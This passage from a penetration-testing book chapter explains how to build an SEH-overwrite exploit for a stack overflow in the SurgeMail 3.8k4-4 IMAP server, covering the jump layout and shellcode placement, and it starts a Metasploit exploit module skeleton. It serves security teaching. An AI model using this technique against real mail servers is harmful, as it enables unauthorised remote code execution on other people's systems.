204
Chapter 14
Hopping Around SEH Restrictions
Following the SEH overwrite, there’s very little space for shellcode before the
end of the stack. Normally, a
POP-POP-RETN
set of instructions would be used
to reach the Next SEH (NSEH), followed by a short jump forward into the
shellcode. We’ll overcome this limited space restriction by developing an
exploit to use as much space as possible for our final payload. At this point,
we are done with the fuzzing process and we’ll move into developing an
exploit for the vulnerability that we found.
This exploit would be a good candidate for an
egg hunter
, which is a small
segment of shellcode that searches memory for the main payload; however,
we’ll use a different tactic and overwrite SEH with the
POP-POP-RETN
instruc-
tion pointer. Once that’s overwritten we’ll make a short jump backward that
requires very few instructions (rather than jumping forward). Next, we’ll use
the space gained in the short jump to execute the larger near jump farther
back into a NOP slide and shellcode. Although it’s not required, a NOP slide
is always a good addition to an exploit, because it gives you a little room for
error should the buffer position change in memory. NOPs will have no adverse
impact on the exploit code and will act as filler. Conceptually, the attack will
look like this:
[Buffer of garbage | NOP Slide | Shellcode | Near Jump | Short Jump | POP-POP-RETN]
To ensure portability of the exploit across different versions of Windows,
use a return address from an application DLL or executable. In this case,
only the application executable itself is available, so you can try to accom-
plish a three-byte overwrite of SEH using a
POP-POP-RETN
sequence of
instructions from the
surgemail.exe
file. If this can be done successfully, the
exploit will be universal across versions of Windows.
Let’s move on to creating the actual exploit for the SurgeMail vulnerability.
Following is our initial skeleton exploit module to be saved in
/root/.msf3/
modules/exploits/windows/imap/
:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Surgemail IMAP Server
version 3.8k4-4 by sending an overly long LIST command. Valid IMAP
account credentials are required.
},
'Author' => [ 'ryujin' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',